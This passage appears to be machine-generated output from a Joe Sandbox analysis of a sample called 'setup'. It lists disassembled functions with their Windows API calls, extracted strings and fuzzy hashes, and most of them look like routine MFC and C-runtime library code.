                                                                                                                          • API ID: lstrlen$_strlen
                                                                                                                          • String ID: text
                                                                                                                          • API String ID: 381002886-999008199
                                                                                                                          • Opcode ID: 345ddc0f22acecf4845b75ab008511bb1fbe765833e52eef8abe99be6dddef23
                                                                                                                          • Instruction ID: 7349b463e7437e6ae5d681fa0a95c7c0dcac0b1c16a5141772d014d4e8a39531
                                                                                                                          • Opcode Fuzzy Hash: 345ddc0f22acecf4845b75ab008511bb1fbe765833e52eef8abe99be6dddef23
                                                                                                                          • Instruction Fuzzy Hash: E3210831600111AFDB10EB19EC46E7A77A9EF44370F148265F819EB2A2DB31DE45FAB0
                                                                                                                          Function 00C11B16 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_
                                                                                                                          • String ID: Text file (*.txt)|*.txt|All Files (*.*)|*.*||$Unknown.txt$txt
                                                                                                                          • API String ID: 2427045233-3588990919
                                                                                                                          • Opcode ID: 087664a7a955bb7b71065477754a8db33dd84befe534e762322c18826b34c2bd
                                                                                                                          • Instruction ID: 6cfb2bdef2d29164cbd5099e9c17583300feb81ad04572c96ee08b4738edb5f6
                                                                                                                          • Opcode Fuzzy Hash: 087664a7a955bb7b71065477754a8db33dd84befe534e762322c18826b34c2bd
                                                                                                                          • Instruction Fuzzy Hash: 55219070D00618EEDF10EBA8CC52BEEB7B4AF19304F0080AAE51577191DA745F88EFA1
                                                                                                                          Function 00C0EED5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 00C0EF37
                                                                                                                          • TextOutA.GDI32(?,?,?,?,00000000), ref: 00C0EF52
                                                                                                                          • GetTextExtentPoint32A.GDI32(?,?,00000000,?), ref: 00C0EF63
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ExtentPoint32_strlen
                                                                                                                          • String ID: %012u
                                                                                                                          • API String ID: 3127108945-3617517997
                                                                                                                          • Opcode ID: 76201bcdcf4e48eaead9fd65a6559526ac3a304558a1160e35501457d0ec60ec
                                                                                                                          • Instruction ID: e4121c1986fcc1e8483a91e5c2571ce4f1c059e01f71908e9580754c45e347d7
                                                                                                                          • Opcode Fuzzy Hash: 76201bcdcf4e48eaead9fd65a6559526ac3a304558a1160e35501457d0ec60ec
                                                                                                                          • Instruction Fuzzy Hash: C411517260020EABDB10EFA4DC4AEEF7BB8EB49714F040469F641E7181D674E545DBE0
                                                                                                                          Function 00C01E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C01E10
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,Cookie: ,00000000,00000020,00C01B22,00000000,00000000), ref: 00C01EB1
                                                                                                                          • GetLastError.KERNEL32 ref: 00C01EB7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$H_prolog3_
                                                                                                                          • String ID: Cookie:
                                                                                                                          • API String ID: 3339191932-3195769419
                                                                                                                          • Opcode ID: be487943edc6ad7e8c5580670888e10ee7cf48c75f4c99e32d5efbb118bde733
                                                                                                                          • Instruction ID: 0648d37dc3018f9ea1c0bbd277a8b29be9f5585cf82a9851e01bbf3a3d41b949
                                                                                                                          • Opcode Fuzzy Hash: be487943edc6ad7e8c5580670888e10ee7cf48c75f4c99e32d5efbb118bde733
                                                                                                                          • Instruction Fuzzy Hash: 46210771A00205AFDB04EFA4C899BEEB7B4BF18314F185029E965EB191DA30A944CB61
                                                                                                                          Function 00C20942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C22AB0: __EH_prolog3.LIBCMT ref: 00C22AB7
                                                                                                                            • Part of subcall function 00C22AB0: RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,00000000,00000000,00000000,00000000,00000037,Browse for File,00000000), ref: 00C22D58
                                                                                                                          • IsWindow.USER32(?), ref: 00C2098C
                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C209A0
                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C209BB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$H_prolog3Redraw
                                                                                                                          • String ID: EDIT
                                                                                                                          • API String ID: 1457668980-3080729518
                                                                                                                          • Opcode ID: 723ae2695790122581cd216feaf837994771e7712a88e5a60fb766edd7856c5c
                                                                                                                          • Instruction ID: 0fda28255faa0f7c37203756c31100562621ff728382e4ae7b25b441bb2e6681
                                                                                                                          • Opcode Fuzzy Hash: 723ae2695790122581cd216feaf837994771e7712a88e5a60fb766edd7856c5c
                                                                                                                          • Instruction Fuzzy Hash: 7F119131300215AFDF215F55DC58E5B3B6AFF98750B104029F946872A2CB71CD50DB50
                                                                                                                          Function 00C1EE67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,?,?,00C1F357,?,?), ref: 00C1EE79
                                                                                                                          • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00C1EE8F
                                                                                                                          • wsprintfW.USER32 ref: 00C1EED4
                                                                                                                          Strings
                                                                                                                          • %d/%d/%d %02d:%02d:%02d, xrefs: 00C1EECE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$File$DateLocalwsprintf
                                                                                                                          • String ID: %d/%d/%d %02d:%02d:%02d
                                                                                                                          • API String ID: 3193010481-3190809460
                                                                                                                          • Opcode ID: 2aa827f64f8fe724bd7c1c60262ee107ebc794df479c64379253bf10bb2147dd
                                                                                                                          • Instruction ID: 958fdc9d4c0e35664521e85634ccb9fb00af98b8fa37cce64886019f0e2b4112
                                                                                                                          • Opcode Fuzzy Hash: 2aa827f64f8fe724bd7c1c60262ee107ebc794df479c64379253bf10bb2147dd
                                                                                                                          • Instruction Fuzzy Hash: E2011DF3A105197BEB488B59CC46FFB36ADEA44600B05426AF915D6280F674DF4097A4
                                                                                                                          Function 00C2F159 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C3F2B5: EnterCriticalSection.KERNEL32(00CC3BA0,?,MultiDataViewCtrl,?,?,00C2F254,00000001), ref: 00C3F2E6
                                                                                                                            • Part of subcall function 00C3F2B5: InitializeCriticalSection.KERNEL32(00000000,?,00C2F254,00000001), ref: 00C3F2FC
                                                                                                                            • Part of subcall function 00C3F2B5: LeaveCriticalSection.KERNEL32(00CC3BA0,?,00C2F254,00000001), ref: 00C3F30A
                                                                                                                            • Part of subcall function 00C3F2B5: EnterCriticalSection.KERNEL32(00000000,MultiDataViewCtrl,?,?,00C2F254,00000001), ref: 00C3F317
                                                                                                                            • Part of subcall function 00C3E41C: __EH_prolog3_catch.LIBCMT ref: 00C3E423
                                                                                                                            • Part of subcall function 00C2FABA: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00C2FAE0
                                                                                                                            • Part of subcall function 00C2FABA: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C2FAF0
                                                                                                                            • Part of subcall function 00C2FABA: EncodePointer.KERNEL32(00000000), ref: 00C2FAF9
                                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 00C2F19B
                                                                                                                          • FreeLibrary.KERNEL32(?,?,00C2DD73,?,00000000,?,00C38AF2,?,00000000,?,?,00000000,00C36095,?,00000007), ref: 00C2F1AB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AddressEnterProc$EncodeFreeH_prolog3_catchHandleInitializeLeaveLibraryModulePointer
                                                                                                                          • String ID: HtmlHelpW$hhctrl.ocx
                                                                                                                          • API String ID: 849444252-3773518134
                                                                                                                          • Opcode ID: 541bcf0728f3eadb8e2e9c83184d3514f2540ee9de60b7e2447703294ba28edf
                                                                                                                          • Instruction ID: 427e3e08c0ad6509874d90f381d753193dcc64965422a9a2619a2158ee3de493
                                                                                                                          • Opcode Fuzzy Hash: 541bcf0728f3eadb8e2e9c83184d3514f2540ee9de60b7e2447703294ba28edf
                                                                                                                          • Instruction Fuzzy Hash: 8101883650071EEFDF106BA1EC09B2E7AB4EF00750F00843DFD5A969A1D731D821A661
                                                                                                                          Function 00C6A630 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,?,00000000,00000004), ref: 00C6A658
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID: file:///$file://localhost/
                                                                                                                          • API String ID: 3188754299-3684072235
                                                                                                                          • Opcode ID: 85fb7bcbcd30aa38f87750a50c76327b8dbfe6ad246b4604d93e786c537db4e8
                                                                                                                          • Instruction ID: 35e4808bb67fecf1ee2bee800dc05253657fac612652f7ea36f7b1c0d6e52ebb
                                                                                                                          • Opcode Fuzzy Hash: 85fb7bcbcd30aa38f87750a50c76327b8dbfe6ad246b4604d93e786c537db4e8
                                                                                                                          • Instruction Fuzzy Hash: CAF02733B846352BCA1526387C56BDE374C4F26B3AB098222FC2CF92C2F642DE4015D6
                                                                                                                          Function 00C3B452 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,?), ref: 00C3B465
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00C3B475
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: Advapi32.dll$RegDeleteKeyTransactedW
                                                                                                                          • API String ID: 1646373207-2168864297
                                                                                                                          • Opcode ID: 3b1ad676cf8a9c4a72e4be054fd28988aaa935aca517157f84e38c0c8b0c4847
                                                                                                                          • Instruction ID: f6f34dd2d5868e5d034b2c69442c833147fa867e9b7d7e6ce0dacde71142c09c
                                                                                                                          • Opcode Fuzzy Hash: 3b1ad676cf8a9c4a72e4be054fd28988aaa935aca517157f84e38c0c8b0c4847
                                                                                                                          • Instruction Fuzzy Hash: 41F09033210209AFDB201F94EC48A7A779DFB803EAB10843AF35591060C7718C009764
                                                                                                                          Function 00C3D666 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00C3D681
                                                                                                                          • GetClassNameW.USER32(?,?,0000000A), ref: 00C3D696
                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00C3D6AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassCompareLongNameStringWindow
                                                                                                                          • String ID: combobox
                                                                                                                          • API String ID: 1414938635-2240613097
                                                                                                                          • Opcode ID: 3b51c5f630a77e2d7912964eec558a9ab0cc6ea9223e506b6b7e1b9787f15662
                                                                                                                          • Instruction ID: 8219ae29b2abab7b21da997910083350ac8ff69588d273201245069a52a060e2
                                                                                                                          • Opcode Fuzzy Hash: 3b51c5f630a77e2d7912964eec558a9ab0cc6ea9223e506b6b7e1b9787f15662
                                                                                                                          • Instruction Fuzzy Hash: 55F0C232665219BBCB00EF689C4AFAE77B8AB05720F500315F936EB1C1DB60AA058795
                                                                                                                          Function 00C4454D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C44564
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 00C44574
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: GetFileAttributesTransactedW$kernel32.dll
                                                                                                                          • API String ID: 1646373207-1378992308
                                                                                                                          • Opcode ID: cee86d97ab5297b48dd5eeaa9dc112b8d4b5cea760194ec91bf1c2f8660945cf
                                                                                                                          • Instruction ID: ac15a1832871c4d1ce8973ed3e8f77d1aede54c229addfe29295506d147a5e44
                                                                                                                          • Opcode Fuzzy Hash: cee86d97ab5297b48dd5eeaa9dc112b8d4b5cea760194ec91bf1c2f8660945cf
                                                                                                                          • Instruction Fuzzy Hash: 89F03032200706EFDF255F94EC4CB6E77A8FF04395F24443AF955911A0D7718A50D750
                                                                                                                          Function 00C1E92D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00C1E93D
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00C1E94D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                          • API String ID: 1646373207-2994018265
                                                                                                                          • Opcode ID: 04dad9fd23ea637b16c971da35a3042574dab9e00251dbeb05ff43126e3b20e7
                                                                                                                          • Instruction ID: 996720502d0b61369a6252315ba3f9ce078754120e05171d45623617d1aa6e83
                                                                                                                          • Opcode Fuzzy Hash: 04dad9fd23ea637b16c971da35a3042574dab9e00251dbeb05ff43126e3b20e7
                                                                                                                          • Instruction Fuzzy Hash: BFF03C32150209EBDF210F94AC04FD9BBA5BB19756F044525FA15D50B0C376C8B0EB50
                                                                                                                          Function 00C1E9FF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00C1EA0F
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00C1EA1F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                          • API String ID: 1646373207-3913318428
                                                                                                                          • Opcode ID: ecc91ace398774d1be84e677ac326922c54a5c727e5b914c9ef156a7d3d2ec5d
                                                                                                                          • Instruction ID: 7ebeecde54437ff792e11ce3519a6d75632e2f8297fa5e0880afb535c62af0ba
                                                                                                                          • Opcode Fuzzy Hash: ecc91ace398774d1be84e677ac326922c54a5c727e5b914c9ef156a7d3d2ec5d
                                                                                                                          • Instruction Fuzzy Hash: 76F0FE32144209FBDF215F959C08BEA7FA9BF05751F088426FA51D50A0D772D9A0FB60
                                                                                                                          Function 00C70E62 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C70E13,00000000,?,00CC44CC,?,?,?,00C70FB6,00000004,InitializeCriticalSectionEx,00CA47EC,InitializeCriticalSectionEx), ref: 00C70E6F
                                                                                                                          • GetLastError.KERNEL32(?,00C70E13,00000000,?,00CC44CC,?,?,?,00C70FB6,00000004,InitializeCriticalSectionEx,00CA47EC,InitializeCriticalSectionEx,00000000,?,00C70D6D), ref: 00C70E79
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C70EA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID: api-ms-
                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                          • Opcode ID: 218b330aca39a16d250edaba0abfb3c86649173d090403c2a4b6e4a843062e72
                                                                                                                          • Instruction ID: 7aabb02236e50c0d449aa1a9474e53f1ab57aaea9c336f7879ba47bde13d3d74
